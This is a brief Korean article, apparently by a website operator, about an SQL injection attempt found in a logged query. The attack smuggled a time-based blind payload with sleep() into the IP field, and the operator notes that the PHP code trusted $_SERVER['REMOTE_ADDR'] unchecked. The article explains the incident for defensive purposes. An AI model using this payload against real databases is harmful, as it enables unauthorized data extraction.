ip 헤더를 변경한 sql injection 공격

운영자 | 기사입력 2021/03/08 [01:20]
>
필자의 다른기사 보기 인쇄하기 메일로 보내기 글자 크게 글자 작게
ip 헤더를 변경한 sql injection 공격
 
운영자   기사입력  2021/03/08 [01:20]

executing | select count(*) from news_report_count  where count_ip='0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z'| |

====================================================

ip부분을 변수를 넘겨 받는 것이 아니라   

$ip=$_SERVER["REMOTE_ADDR"];

로 받았는데 이 부분에 sql injection 공격을 한것이다 

보통 넘겨 받는 부분만 sql injection 검사를 하는데 

ip 헤더 이 부분에 변경해서 공격을 한것이다. 

 

 

 

트위터 트위터 페이스북 페이스북 카카오톡 카카오톡
기사입력: 2021/03/08 [01:20]  최종편집: ⓒ iwav